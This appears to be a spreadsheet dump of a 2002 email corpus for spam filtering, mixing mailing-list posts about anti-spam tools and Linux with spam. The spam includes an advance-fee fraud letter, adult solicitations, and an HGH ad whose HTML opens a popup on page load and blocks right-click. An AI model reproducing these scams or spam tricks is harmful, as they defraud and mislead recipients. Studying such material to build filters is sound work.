 site which at least one item of interest ... a piece by Daniel
 McCarthy on Greek ideas of liberty:
 http://www.lewrockwell.com/dmccarthy/dmccarthy35.html
 Plenty of ClassCon in a Newsweek piece "Why We Need Heaven":
 http://www.msnbc.com/news/789252.asp
 ... and a reason for studying Latin and Greek in an interview with
 David McCollough:
 http://www.neh.gov/news/humanities/2002-07/danger.html
 Not sure whether there's comparanda potential in this bit on the 
 crowning of King Puck:
 http://story.news.yahoo.com/news?tmpl=story2&amp;cid=856&amp;ncid=856&amp;e=1&amp;u=/nm/20020810/od_uk_nm/oukoe_ireland_puck_1
 Peter Jones in the Spectator (there's a Hannibal movie coming!):
 http://www.spectator.co.uk/article.php3?table=old&amp;section=current&amp;issue=2002-08-10&amp;id=2137
 ... and Dot Wordsworth:
 http://www.spectator.co.uk/article.php3?table=old&amp;section=current&amp;issue=2002-08-10&amp;id=2138
 Perfess'r Harris' Classics Corner:
 http://www.realchangenews.org/issue/current/classics/classics_corner.html
 Radio Finland's Nuntii Latini
 http://www.yle.fi/fbc/latini/trans.html
 Radio Bremen's Der Monatsrckblick - auf Latein 
 http://www.radiobremen.de/online/latein/
 U.S. Weather in Latin:
 http://latin.wunderground.com/
 ================================================================
 FOLLOWUPS
 ================================================================
 Ancient Chinese Mail:
 http://www.guardian.co.uk/china/story/0,7369,770922,00.html
 Birth Bricks:
 http://www.nytimes.com/2002/08/06/science/social/06BRIC.html?ex=1029729600&amp;en=cbb6833f14483e22&amp;ei=5040&amp;partner=MOREOVER
 "Hidden Nazi Gold":
 http://www.nytimes.com/aponline/international/AP-Germany-Nazi-Gold.html
 http://www.heraldsun.news.com.au/common/story_page/0,5478,4859169%255E663,00.html
 http://www.haaretzdaily.com/hasen/pages/ShArt.jhtml?itemNo=195691&amp;contrassID=1&amp;subContrassID=8&amp;sbSubContrassID=0&amp;listSrc=Y
 Monitor (the coverage varies quite a bit in these):
 http://www.cnn.com/2002/US/08/05/uss.monitor.ap/index.html
 http://www.nytimes.com/2002/08/09/science/09MONI.html
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/ap/20020805/ap_on_go_ca_st_pe/uss_monitor_5
 http://www.msnbc.com/news/789905.asp
 Ninkasi Beer:
 http://story.news.yahoo.com/news?tmpl=story&amp;u=/nm/20020806/od_uk_nm/oukoe_britain_beer_1
 Old Chess Piece:
 http://portal.telegraph.co.uk/news/main.jhtml?xml=%2Fnews%2F2002%2F08%2F06%2Fwchess06.xml
 Replica Egyptian Tombs:
 http://www.ahram.org.eg/weekly/2002/598/hr1.htm
 Return of Ramses I:
 http://www.theartnewspaper.com/news/article.asp?idart=9856
 Return of Roman sculpture by Princeton:
 http://www.theartnewspaper.com/news/article.asp?idart=9855
 Roman Plane from York:
 http://www.fragmentsoftime.com/new_page_8.htm
 Vinland Map:
 http://story.news.yahoo.com/news?tmpl=story2&amp;cid=624&amp;ncid=624&amp;e=12&amp;u=/ap/20020730/ap_on_sc/vinland_map_3
 ================================================================
 EXPLORATOR is a weekly newsletter representing the fruits of
 the labours of 'media research division' of The Atrium. Various
 on-line news and magazine sources are scoured for news of the
 ancient world (broadly construed: practically anything relating
 to archaeology or history  prior to about 1700 or so is fair
 game) and every Sunday they are delivered to your mailbox free of
 charge!
 ================================================================
 Useful Addresses
 ================================================================
 Past issues of Explorator are available on the web at:
 http://groups.yahoo.com/group/Explorator/messages
 To subscribe to Explorator, send a blank email message to:
 mailto:Explorator-subscribe@yahoogroups.com
 To unsubscribe, send a blank email message to:
 mailto:Explorator-unsubscribe@yahoogroups.com
 To send a 'heads up' to the editor:
 mailto:dmeadows@idirect.com
 ================================================================
 Explorator is Copyright (c) 2002 David Meadows. Feel free to
 distribute these listings via email to your pals, students,
 teachers, etc., but please include this copyright notice. These
 listings are not to be posted to a website; instead, please
 provide a link to the past issues and/or the media archive
 mentioned above. Thanks!
 ================================================================
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
 4 DVDs Free +s&amp;p Join Now
 http://us.click.yahoo.com/pt6YBB/NXiEAA/RN.GAA/7gSolB/TM
 ---------------------------------------------------------------------~-&gt;
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: [Razor-users] problems with hubris and/or discovery
</t>
  </si>
  <si>
    <t xml:space="preserve">
 --ey/N+yb7u/X9mFhi
 Content-Type: text/plain; charset=us-ascii
 Content-Disposition: inline
 Content-Transfer-Encoding: quoted-printable
 Folks,
      There have been several major internet outages this morning,
      across major providers UUNet, Genuity, and god knows who else.
      Various routes across the Internet backbones have been
      disappearing, repropagating, and disappearing again.
      This has caused and exacerbated several problems which we are
      working on correcting right now.  We apologize for the
      inconvenience..
 Best,=20
 --jordan
 On Thu, Oct 03, 2002 at 01:18:25PM -0400, Sven Willenberger wrote:
 # trying to report spam [razor chooses hubris] I timeout on the connection
 # (which seems to have gotten slower all morning) and receive the following
 # error message:
 #=20
 # razor-report error: connect4: nextserver: discover1: Error reading socket
 # connect4: nextserver: discover1: Error reading socket
 #=20
 # I then try to run razor-admin -discover and receive the same error .....
 # problems with the servers today? only one discovery server?
 #=20
 # Sven
 #=20
 #=20
 #=20
 # -------------------------------------------------------
 # This sf.net email is sponsored by:ThinkGeek
 # Welcome to geek heaven.
 # http://thinkgeek.com/sf
 # _______________________________________________
 # Razor-users mailing list
 # Razor-users@lists.sourceforge.net
 # https://lists.sourceforge.net/lists/listinfo/razor-users
 --ey/N+yb7u/X9mFhi
 Content-Type: application/pgp-signature
 Content-Disposition: inline
 -----BEGIN PGP SIGNATURE-----
 Version: GnuPG v1.2.0 (GNU/Linux)
 iD8DBQE9nICFpwQdAVEbU7oRAiw+AJ966WR+zA0g47m0E7SkgCMbivfLkgCeOtGc
 V2cgz8USK1UPYH7YJwh1SyM=
 =dZej
 -----END PGP SIGNATURE-----
 --ey/N+yb7u/X9mFhi--
 -------------------------------------------------------
 This sf.net email is sponsored by:ThinkGeek
 Welcome to geek heaven.
 http://thinkgeek.com/sf
 _______________________________________________
 Razor-users mailing list
 Razor-users@lists.sourceforge.net
 https://lists.sourceforge.net/lists/listinfo/razor-users
</t>
  </si>
  <si>
    <t xml:space="preserve">
 On Mon, 09 Sep 2002 12:21:42 PDT,
 	Rick Baartman &lt;baartman@lin12.triumf.ca&gt; wrote:
 &gt; Sorry I wasn't clear. I am transferring messages from my inbox to
 &gt; other folders and since I am doing it from most recent to oldest, they
 &gt; appear in those folders in the wrong order and need re-sorting.
 OK, gotcha.
 I don't think you can do that with exmh, but you can do it on the
 command line, if you use sh or ksh:
 	for f in `folders -fast -r`
 	do
 		echo sorting $f ...
 		sortm +$f
 	done
 It could take a long time.
 At work, I have to use Outlook.  Ick.  I hate it.  But it does a few
 things right.  Like making indices for each folder, and not just by
 date, but also by sender, message size, subject.  So I can sort by any
 column instantly.
 I believe this is possible, too, with an IMAP compliant reader,
 provided the IMAP server makes such indices.
 I am facing the fact that exmh has been left behind in some industry
 standards.  I use it for my personal mail.  My mail server runs unix,
 and I connect over ssh and tunnel my X traffic over ssh.  With a slow
 link, this makes exmh very slow.  And mime handling is pretty bad
 compared with modern mailers.  I am just scared to move.  I've been
 using MH or nmh since 1985 and exmh since 1995.  17 years is a long
 time!
 _______________________________________________
 Exmh-users mailing list
 Exmh-users@redhat.com
 https://listman.redhat.com/mailman/listinfo/exmh-users
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: sylpheed-claws
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 23 Sep 2002 17:41:20 +0200
 Matthias Saou &lt;matthias@egwn.net&gt; wrote:
 # So did my build if the original source is what you were mentioning
 # ;-) One drawback : They changed from pspell to aspell apparently,
 # and it requires aspell &gt;= 0.50 which isn't even in Rawhide, so spell
 # checking is disabled for now until I take a decision about it :-/
 OOps, I didn't see the webpage get updated.  I saw the new claws, and
 checked your site, forgot about it for half a day and then posted
 here.  You beat me once again! 
 # If I build recent aspell packages, they may not be upgraded when
 # ungrating to the next Red Hat Linux release (the final version of
 # the limbos and(null) betas), which is maybe not really desired. I'll
 # probably test and see...
 Oh yeah, I was following this thread in the sylpheed-claws list.  Very
 interesting stuff.  I might have to stick w/ 0.8.2 until aspell gets
 updated in Red Hat.
 -- 
 Jesse Keating
 j2Solutions.net
 Mondo DevTeam (www.mondorescue.org)
 Was I helpful?  Let others know:
  http://svcs.affero.net/rm.php?r=jkeating
 _______________________________________________
 RPM-List mailing list &lt;RPM-List@freshrpms.net&gt;
 http://lists.freshrpms.net/mailman/listinfo/rpm-list
</t>
  </si>
  <si>
    <t xml:space="preserve">Thanks that helps.  There's still so little info on TES and those of us
 here since RazorV1 know how it works.  I did set my min_cf to "ac-100"
 which I thought would be zero.  
 So the way you are suggesting that it works now is that everyone has a
 trust level of 1 and have to work their way up.  Your trust level
 increases when someone nominates the same message as spam. This must
 have been the new changes made at the beginning of the week unless the
 changes dumped everyone's trust level.  Now here come the questions...
 What engine signature does TES look at?  Does it have to be the same e1
 signature or does it use the e2 or e4 signatures.  How many people have
 to nominate the message before everyones rating increases?  How many
 revokes decreases someones rating?  Does a single revoke decrease the
 rating of everyone that nominated the message?  If a newby reports a
 message that has already been reported does their trust level
 immediately go up?  In the case of revoking, does someone with a trust
 level of 1 have the capability to revoke a message submitted by multiple
 people with higher trust levels?
 -----Original Message-----
 From: Vipul Ved Prakash [mailto:mail@vipul.net] 
 Sent: Thursday, August 08, 2002 4:22 AM
 To: razor-users@example.sourceforge.net
 Subject: Re: [Razor-users] What's wrong with the Razor servers now?
 Bobby, 
 Couple of things: 
 If you are not a trusted reporter, your reports will not have an
 immediate effect. It takes a bunch of trusted reporters to bump up the
 confidence of a signature to a point where it is considered to be spam.
 This might be frustrating initially, but as the number of trusted users
 grows the time delay between nominations and determination will become
 shorter. Of course, it's a lot more frustating for people to have their
 legit mail filtered out due to incorrect reporting.
 Also, for the purpose of testing, I'd suggest making your min_cf (in
 razor-agents.conf) to 0. min_cf defaults to the server recommended
 average confidence, which at the moment is 1. Setting min_cf to 0 should
 return true for whatever you submit (as long as it was not revoked by a
 trusted user).
 apt/fire sync with honor every 5 minutes, so you'd have to wait for a
 _maximum_ of 5 minutes before signatures propagate.
 cheers,
 vipul.
 On Wed, Aug 07, 2002 at 11:51:21PM -0400, Rose, Bobby wrote:
 &gt; This is still happening.  Nothing that I report is being registered at
 &gt; all.  I have confirmed that this also affects the Cloudmark Outlook 
 &gt; plugin. If I block a message from Outlook using Spamnet then run it 
 &gt; against the folder containing the message that was reported then 
 &gt; nothing happens.
 &gt; 
 &gt; On the unix side, I've tried different cloudmark servers, different 
 &gt; identies, report from different systems, etc without an effect.  I did
 &gt; find that sample-spam.txt from Spamassassin is only registered on 
 &gt; honor.cloudmark.net and comes back positive from it and it only so 
 &gt; it's clearly not sync'd with apt or fire.
 &gt; 
 &gt; 
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Rose, Bobby
 &gt; Sent: Wednesday, August 07, 2002 1:32 PM
 &gt; To: Patrick
 &gt; Cc: ML-razor-users
 &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; I'm sure others have thought of that.  Probably the only way to 
 &gt; prevent that is to include the host in the report/revoke 
 &gt; authentication.
 &gt; 
 &gt; -----Original Message-----
 &gt; From: Patrick [mailto:patrick@stealthgeeks.net]
 &gt; Sent: Wednesday, August 07, 2002 12:33 PM
 &gt; To: Rose, Bobby
 &gt; Cc: ML-razor-users
 &gt; Subject: RE: [Razor-users] What's wrong with the Razor servers now?
 &gt; 
 &gt; 
 &gt; On Wed, 7 Aug 2002, Rose, Bobby wrote:
 &gt; 
 &gt; &gt; Well at least it's been confirmed. I can say for cetain that it 
 &gt; &gt; started on Monday since that was when I noticed a huge drop in stats
 &gt; of messages
 &gt; &gt; that were tagged as being in razor.   And I know it was fine on
 &gt; Friday.
 &gt; &gt; It may have something to do with the upgrades on the servers that 
 &gt; &gt; Vipul mentioned.  If TES is going to decide on what gets registered 
 &gt; &gt; and what doesn't then razor-report should provide some debug info 
 &gt; &gt; about the refusal.  You are correct about the need for more info on 
 &gt; &gt; TES, but it probably won't happen for fear of circumvention.
 &gt; 
 &gt; &lt;INSERT RANT REGARDING SECURITY THROUGH OBSCURITY&gt;
 &gt; 
 &gt; On the way into work I thought of some fairly easy ways to circumvent 
 &gt; what I imagine the current trust model to be based on individual users
 &gt; blindly submitting reports and checking results.
 &gt; 
 &gt; It's hard to imagine others haven't as well, as I'm not too bright.
 &gt; 
 &gt; 
 &gt; /\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\
 &gt; /\
 &gt; /\/\/\
 &gt;                                Patrick Greenwell
 &gt;          Asking the wrong questions is the leading cause of wrong
 &gt; answers
 &gt;
 \/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/
 &gt; \/\/\/
 &gt; 
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf 
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users
 &gt; 
 &gt; 
 &gt; -------------------------------------------------------
 &gt; This sf.net email is sponsored by:ThinkGeek
 &gt; Welcome to geek heaven.
 &gt; http://thinkgeek.com/sf 
 &gt; _______________________________________________
 &gt; Razor-users mailing list
 &gt; Razor-users@lists.sourceforge.net 
 &gt; https://lists.sourceforge.net/lists/listinfo/razor-users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t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [SAtalk] Version 1.1.11 of the DCC (fwd)
</t>
  </si>
  <si>
    <t xml:space="preserve">---------- Forwarded message ----------
 From: Vernon Schryver &lt;vjs@calcite.rhyolite.com&gt;
 To: dcc@calcite.rhyolite.com
 Date: Mon, 26 Aug 2002 09:09:05 -0600 (MDT)
 Subject: Version 1.1.11 of the DCC
 ersion 1.1.11 of the DCC source is in
 http://www.rhyolite.com/anti-spam/dcc/source/dccd.tar.Z and
 http://www.dcc-servers.net/dcc/source/dccd.tar.Z
 http://www.rhyolite.com/anti-spam/dcc/dcc-tree/CHANGES and
 http://www.dcc-servers.net/dcc/dcc-tree/CHANGES start with
     fix dccm bugs with handling a non-responsive server.
     change misc/hackmc to modify sendmail.cf to reject unauthorized relay
 	attempts with a temporary failure when they are supposed to be sent
 	to the DCC but dccm is not running.  This prevents leaking relay
 	relay spam.  You must use the new hackmc script to install this
 	change in sendmail.cf.
     remove "# whitelisted" from `cdcc stats` output to give more room
 	for totals.
     prevent empty dccproc log files as noted by Krzysztof Snopek.
     even fatal errors should cause dccproc to exit with 0 to avoid
 	rejecting mail, as noted by Krzysztof Snopek.
     When server hostnames have common IP addresses, prefer the server
 	with the non-anonymous client-ID, noted by Krzysztof Snopek.
 Vernon Schryver    vjs@rhyolite.com
 _______________________________________________
 DCC mailing list      DCC@rhyolite.com
 http://www.rhyolite.com/mailman/listinfo/dcc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</si>
  <si>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Fw: Re: Account For Cum Shots To: zzzz@example.com OfferID: qxjx
</t>
  </si>
  <si>
    <t xml:space="preserve"> ##################################################
 #                                                #
 #                 Adult Club                     #
 #           Offers FREE Membership               #
 #                                                #
 ##################################################
 &gt;&gt;&gt;&gt;&gt;  INSTANT ACCESS TO ALL SITES NOW
 &gt;&gt;&gt;&gt;&gt;  Your User Name And Password is.
 &gt;&gt;&gt;&gt;&gt;  User Name: zzzz@example.com
 &gt;&gt;&gt;&gt;&gt;  Password: 1534
 3 of the Best Adult Sites on the Internet for FREE!
 ---------------------------------------
 NEWS 08/15/02
 With just over 2.9 Million Members that signed up for FREE, Last month
 there were 721,184 New
 Members. Are you one of them yet???
 ---------------------------------------
 Our Membership FAQ
 Q. Why are you offering free access to 3 adult membership sites for
 free?
 A. I have advertisers that pay me for ad space so you don't have to pay
 for membership.
 Q. Is it true my membership is for life?
 A. Absolutely you'll never have to pay a cent the advertisers do.
 Q. Can I give my account to my friends and family?
 A. Yes, as long they are over the age of 18.
 Q. Do I have to sign up for all 3 membership sites?
 A. No just one to get access to all of them.
 Q. How do I get started?
 A. Click on one of the following links below to become a member.
 - These are multi million dollar operations with policies and rules.
 - Fill in the required info and they won't charge you for the Free pass!
 - If you don't believe us, just read their terms and conditions.
 ---------------------------
 new! &gt; Tilthy Teen Sluts (added 08-15-02)
 The Ultimate XXX TEEN Site... Its all for FREE!!
 &gt;&gt;&gt; Click Here:
 http://www.bozombo.com/filthyteensluts/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/filthyteensluts/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 new! &gt; Lucky Amateur Wives (added 08-08-02)
 Amateur Wives Giving it up... Its all for FREE!!
 http://www.bozombo.com/luckyamateurwives/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/luckyamateurwives/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 new! &gt; BOOB RANCH (added 08-01-02)
 See The Worlds Best Boobs On The Net... Its all for FREE!!
 &gt;&gt;&gt; Click Here: http://www.bozombo.com/hugetits/index.php?affid=1534
 &lt;a
 href="http://www.bozombo.com/luckyamateurwives/index.php?affid=1534"&gt;AOL
 Users Click Here&lt;/a&gt;
 --------------------------
 Jennifer Simpson, Miami, FL
 Your FREE lifetime membership has entertained my boyfriend and I for
 the last two years!  Your Adult Sites are the best on the net!
 Joe Morgan Manhattan, NY
 Your live sex shows and live sex cams are unbelievable. The best part
 about your porn sites, is that they're absolutely FREE!
 --------------------------
 Removal Instructions And Disclaimer:
 We are strongly against sending unsolicited emails to those who do not
 wish to receive our special mailings. You have opted in to one or more
 of our affiliate sites requesting to be notified of any special offers
 we may run from time to time. We also have attained the services of an
 independent 3rd party to overlook list management and removal services.
 This is NOT unsolicited email. If you do not wish to receive further
 mailings, please Click on this URL http://greenzer.com/remove.php or &lt;a
 href="http://greenzer.com/remove.php"&gt;AOL Users Click Here&lt;/a&gt; to be
 removed from the list. Please accept our apologies if you have been sent
 this email in error. We honor all removal requests.
 qvnckofayjfpfpsswkfvdrmcyljarjxw
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: RE: [ILUG] hard- vs. soft-links [was: How to copy some files ]
</t>
  </si>
  <si>
    <t xml:space="preserve">Use the GUI and don't delete files, use the other option, whats it called
 again, the dustbin or something ;-)
 Conor who only knows about symbolic links ;-))
 I'm pretty sure that I have a softlink from
 /mnt/public/mnt/public/downloads/Linux/wasteCPU/setiathome to
 /home/cwynne/seti
 The /mnt/pub....../seti.. directory resides on an external raidvolume and
 /home/../seti is on the internal IDE2 drive. 
 So I dont have to cd around the gaf. I suppose that would count as across
 different devices. 
 If you're wondering [probably not] why /mnt/public is there twice, its
 because I restored from tapebackup and I didn't know that it keeps the
 directory structure. I know now ;-)
 Actually, how can I fix that quickly and easily? I thought about firstly
 mv'ing the structure to /tmp. Then copying it back again but I'm sure some
 wee genius knows a quickie solution. Mind you I never even bothered trying a
 its not a priority now that its all linked anyway. 
 CW
 --------------------------------
  hum.  interesting variation on the classic technique of
  redefining `rm' to `mv' the files into `./.trash/' (or
  with a prefix of `#' or a suffix of `~'; the variations
  are endless).  these classic techniques only provide a
  means to roll back accidental `rm's, so there is still
  considerable scope for data lost as there are other ways
  of deleting files --- which is not a problem for this
  hard link idea.
  but, like the classic techniques, there is no rolling
  back of accidental overwrites.
  ( rolling back overwrites reminds me of the "snapshot"
   facility on NetWork Appliance fileservers.  and of the
   various "versioning" filesystems which appeared --- and
   then vanished? --- over the years.... )
  one severe(?) gotcha is some files shouldn't have any
  hard links.  both RCS *,v (and hence CVS) and SCCS s.*
  files are like this --- the RCS(/CVS?)/SCCS toolsets
  complain if there are hard links.
 cheers,
 	-blf-
 --
  Innovative, very experienced, Unix and      | Brian Foster    Dublin,
 Ireland
  Chorus (embedded RTOS) kernel internals     | e-mail: blf@utvinternet.ie
  expert looking for a new position ...       | mobile: (+353 or 0)86 854
 9268
   For a rsum, contact me, or see my website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</si>
  <si>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On Mon, 2002-07-22 at 17:19, Joseph S. Barrera III wrote:
 &gt; - Joe
 &gt; 
 &gt; P.S. I hate everybody.
 So you /are/ beberg posting under another name. Finally proof of what
 we've known all along. ;)
 Luis
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">On Mon, 26 Aug 2002, Geege wrote:
 &gt; Summary:
 &gt; Latest Rambus memory plus fast bus appear to give Intel's newest P4 the
 &gt; jolt it needs.
 &gt;
 &gt; Geege attached the following message:
 &gt; ------------------------------------------------------------
 &gt; ha ha ha harley.  rambus earns it.
 &gt; ------------------------------------------------------------
 "Expect a 3 percent to 5 percent boost with PC1066"
 5% faster for only 4 times [pricewatch at 7:55PM - 93 vs 379] the cost.
 Gimme gimme gimme! And I better get the full 5% speedup.
 And gime me that 20% faster GeForce 4600 at twice the cost of the 4200 too.
 Seriously, who falls for this scam?
 P.S. finished the PS2 port, it benchmarks at fp:1 int:40. a celeron 525
 benches at fp:460 int:400... If it's not a polygon fill the thing is
 useless. There will be no beowolf cluster of these. It is 3x faster then
 the iPaq tho at 1/13 :)
 - Adam L. "Duncan" Beberg
   http://www.mithral.com/~beberg/
   beberg@mithral.com
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: We Pay You $800 Weekly_Guaranteed27147
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;center&gt;&lt;p&gt;&lt;b&gt;&lt;font color=3D"red" size=3D"4"&gt;Up to $80 per hour &amp;#150=
 ; Satisfaction Guaranteed! &lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 		&lt;p&gt;You can actually start today. You&amp;#x2019;re paid daily or weekly&lt;br&gt;
 			and you&amp;#x2019;re backed with a 100% protection guarantee!&lt;br&gt;
 		&lt;/p&gt;
 		&lt;p&gt;&lt;/p&gt;
 		&lt;a href=3D"http://www.btimarketing.com"&gt;Click Here For Details!&lt;br&gt;
 			&lt;br&gt;
 			&lt;br&gt;
 			&lt;br&gt;
 		&lt;/a&gt;
 &lt;p&gt;In compliance with state and federal guidelines and requirements, this =
 announcement is prefaced with the ADV: subject line announcement, and incl=
 udes a valid remove. If you do not wish to receive this message again, or =
 you are currently a subscriber, opt in, or permission recipient and wish t=
 o unsubscribe, simply email&lt;html&gt;&lt;a
 href=3D"remove1634@removefactory.com"&gt;remove1634@removefactory.com&lt;/a&gt;&lt;/ht=
 ml&gt;with remove in the subject line and send. All unsubscribe and remove re=
 quests will be cheerfully processed. Thanks for your positive assistance. =
 Have a wonderful day!
 &lt;/p&gt;
 &lt;/html&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">This message is in MIME format. Since your mail reader does not understand
 this format, some or all of this message may not be legible.
 --=_NextPart_Caramail_0229421032517739_ID
 Content-Type: text/plain; charset="us-ascii"
 Content-Transfer-Encoding: 7bit
 SENIOR ADVOCATE OF NIGERIA 
 BARR. WILLIAMS FALANA (SAN)
 Dear Sir, 
 I am Barrister Williams Falana a member of Nigeria Bar 
 Association (NBA).Your contact reached me through the World 
 Business Encyclopaedia.Hence,I made up my mind to introduce 
 this business to you in confidence for the mutual benefit 
 of both of us. 
 The sum of USD48M (Forty eight Million United States) was 
 lodged into a security company here in the Country by the 
 late Head of State (GEN.SANI ABACHA) for safe-keeping. This 
 money was lodged in security vaults / boxes and labelled as
 personal belongings and as such the security company does 
 not know the true content of the boxes.This money was 
 originally meant to be used for his political campaign. 
 Because I was his family Attorney as such he confided in me 
 with the relevant document papers relating to this deposit 
 before he died of cardiac arrest.
 As a matter of fact we have concluded all arrangement with 
 an offshore Security Company to move this money as a 
 consignment through diplomatic means to their offshore 
 affiliated office where you will be required to put claim 
 to the consignment as the bonafide beneficiary of the 
 consignment. You should know that this business is safety 
 and 100% risk-free as it does not involve drug money or 
 Terrorist fund.
 If you are interested to carry out this transaction with 
 me, 20% will be for you for your assistance, 5% for general 
 expenses, and 75% for us.
 You are required to send by e-mail immediately your Full 
 name and Address, which I will use to draft an agreement 
 that will guide and protect both of us in this transaction 
 also which will be used to effect the change of ownership 
 of the consignment to your name as the beneficiary of the 
 consignment.
 Also send me your Telephone and Fax numbers for easy 
 communication
 Once you notify me your willingness by sending the above 
 requirement.This transaction will be concluded within 7 
 (seven) working days.
 I will be waiting for your urgent reply.You can reach me on 
 my Cell Telephone No: 234-80- 33055024 or my alternative E-
 mail: williamsfalana@caramail.com 
 Best regards, 
 Barrister Williams Falana {SAN} 
 _________________________________________________________ 
 Envoyez des messages musicaux sur le portable de vos amis 
  http://mobile.lycos.fr/mobile/local/sms_musicaux/
 --=_NextPart_Caramail_0229421032517739_ID--
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Double Your Life Insurance at NO EXTRA COST!...               TCTOOM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</si>
  <si>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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/"&gt;&lt;font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href=3D"http://insurancequotesource.com/user0202/termquotes/473400/
 "&gt;&lt;font
 face=3D"arial"
 size=3D"5"&gt;
 &lt;b&gt;GET A FREE QUOTE NOW!&lt;/b&gt;&lt;/font&gt;&lt;/a&gt;
 &lt;br&gt;
 &lt;font face=3D"arial" size=3D"2" color=3D"#000000"&gt;
 &lt;i&gt;You can't predict the future, but you can always
 prepare for it.&lt;/i&gt;&lt;/font&gt;
 &lt;/center&gt;&lt;/TR&gt;&lt;/TABLE&gt;&lt;/CENTER&gt;&lt;br&gt;&lt;br&gt;
 &lt;font face=3D"arial,verdana" size=3D1.5 color=3D"#8182AB"&gt;&lt;p
 align=3D"center"&gt;&lt;br&gt;&lt;br&gt;
 &lt;a
 href=3D"http://marketing-fashion.com/light/watch.asp"&gt;to be
 excluded from future contacts &lt;/a&gt;&lt;/p&gt;&lt;/font&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 tuckers
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Re: By the way
</t>
  </si>
  <si>
    <t xml:space="preserve">Joe McNally writes:
 &gt; What the hell is it with these mini remote control cars? Not only has 
 &gt; my mailbox been full of spam advertising them, but there's a fairly 
 &gt; large stall selling them at Paddington station.
 &gt; -- 
 &gt;   Joe McNally :: Flaneur at Large :: http://www.flaneur.org.uk 
 &gt;
 Any chance you could bring a wire-cutters with you the next time you're 
 passing through, and cut their 'net connection? 
 Hang on....mini - Mini... the the ETs have seen the Mini advert and have 
 decided to get revenge by invading in the form of spambots and small 
 'remote' cars. These are the probes that some of the Saucerheads rattle on 
 about, probes that are fired into the atmosphere from the mama-ships. 
 Thanks Joe, there's an idea for a whacky blather issue here. 
 To unsubscribe from this group, send an email to:
 forteana-unsubscribe@egroups.com
 Your use of Yahoo! Groups is subject to http://docs.yahoo.com/info/terms/ 
</t>
  </si>
  <si>
    <t xml:space="preserve">On 10/2/02 12:00 PM, "Mr. FoRK" &lt;fork_list@hotmail.com&gt; wrote:
 &gt; What about a situation where you don't directly ask/talk to the bot, but
 &gt; they listen in and advise/correct/interject/etc?
 &gt; example: two people discussing trips, etc. may trigger a weather bot to
 &gt; mention what the forecast says - without directly being asked.
 My guess is it's more insidious than that, it's going to be ActiveSpam.
 "Oh, you're going to Seattle? I can get you airline tickets for less"
 Yuck
 -- 
 peregrine   \PEH-ruh-grun or PEH-ruh-green\   (adjective)
      : having a tendency to wander
</t>
  </si>
  <si>
    <t xml:space="preserve">On Sat, Jul 20, 2002 at 01:40:56PM +0100, Paul Jakma wrote:
 &gt; another good place to find cats is a local farm, as farms tend to have
 &gt; lots of cats. pick a healthy looking kitten and bring it off to vet
 &gt; for shots etc. as it probably wont have had any. a plus side is that
 &gt; if you get a slightly older kitten (say 2 months) it'll have some
 &gt; hunting experience.
 what is this obsession of yours with cats that hunt?  you realise that
 while cats will sometimes bring birds to your bed, it's the wrong kind
 of bird...  :)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Social Events: social@linux.ie
 http://www.linux.ie/mailman/listinfo/social for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Introducing HGH: The Most Powerful Anti-Obesity Drug Ever
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;html&gt;&lt;body onload="window.open('http://202.101.163.34:81/ultimatehgh_run/')" bgColor="#99ff99" topmargin=1 onMouseOver="window.status=''; return true" oncontextmenu="return false" ondragstart="return false" onselectstart="return false"&gt;
 &lt;div align="center"&gt;&lt;!--zzzz--&gt;&lt;!----&gt;Hello, jm@spamassassin.taint.org&lt;BR&gt;&lt;BR&gt;&lt;/div&gt;&lt;div align="center"&gt;&lt;/div&gt;&lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Hu&lt;!----&gt;man Growth Horm&lt;!----&gt;one Therapy&lt;/font&gt;&lt;/b&gt;&lt;/p&gt;
 &lt;p align="center"&gt;&lt;b&gt;&lt;font face="Arial" size="4"&gt;Lose weight while building lean muscle mass&lt;br&gt;and reversing the ravages of aging all at once.&lt;/font&gt;&lt;font face="Arial" size="3"&gt;&lt;br&gt;
 &lt;/font&gt;&lt;/b&gt;&lt;font face="Arial" size="3"&gt; &lt;br&gt;
 As seen on NBC, CBS, and CNN, and even Oprah! The health&lt;br&gt;
 discovery that actually reverses aging while burning fat,&lt;br&gt;
 without dieting or exercise! This proven discovery has even&lt;br&gt;
 been reported on by the New England Journal of Medicine.&lt;br&gt;
 Forget aging and dieting forever! And it's Guaranteed!&lt;/font&gt;&lt;/p&gt;
